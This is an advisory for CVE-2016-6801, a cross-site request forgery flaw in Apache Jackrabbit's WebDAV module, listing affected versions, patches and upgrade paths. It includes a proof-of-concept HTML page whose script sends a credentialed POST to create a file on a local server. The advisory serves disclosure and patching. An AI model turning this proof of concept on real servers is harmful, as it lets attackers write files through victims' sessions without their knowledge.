CVE-2016-6801: CSRF in Jackrabbit-Webdav using empty content-type

Severity: Important

Vendor:
The Apache Software Foundation

Versions Affected:
Apache Jackrabbit 2.4.5
Apache Jackrabbit 2.6.5
Apache Jackrabbit 2.8.2
Apache Jackrabbit 2.10.3
Apache Jackrabbit 2.12.3
Apache Jackrabbit 2.13.2

Description:
The CSRF content-type check for POST requests does not handle missing Content-Type header fields, nor variations in field values with respect to upper/lower case or optional parameters. This can be exploited to create a resource via CSRF.

Mitigation:
2.4.x users upgrade to 2.4.5 and apply the patch in http://svn.apache.org/r1758791 and/or upgrade to 2.4.6 once released
2.6.x users upgrade to 2.6.5 and apply the patch in http://svn.apache.org/r1758771 and/or upgrade to 2.6.6 once released
2.8.x users upgrade to 2.8.2 and apply the patch in http://svn.apache.org/r1758764 and/or upgrade to 2.8.3 once released
2.10.x users should upgrade to 2.10.4
2.12.x users should upgrade to 2.12.4
2.13.x users should upgrade to 2.13.3

Example:
A resource can be created like so:
<html>
  <body>
    <script>
      function submitRequest()
      {
        var xhr = new XMLHttpRequest();
        xhr.open("POST", "http://localhost:42427/test/csrf.txt", true);
        xhr.withCredentials = true;
        var body = "This file has been uploaded via CSRF.=\r\n";
        var aBody = new Uint8Array(body.length);
        for (var i = 0; i < aBody.length; i++)
          aBody[i] = body.charCodeAt(i);
        xhr.send(new Blob([aBody]));
      }
    </script>
    <form action="#">
      <input type="button" value="Submit request" onclick="submitRequest();" />
    </form>
  </body>
</html>

Credit:
This issue was discovered by Lukas Reschke.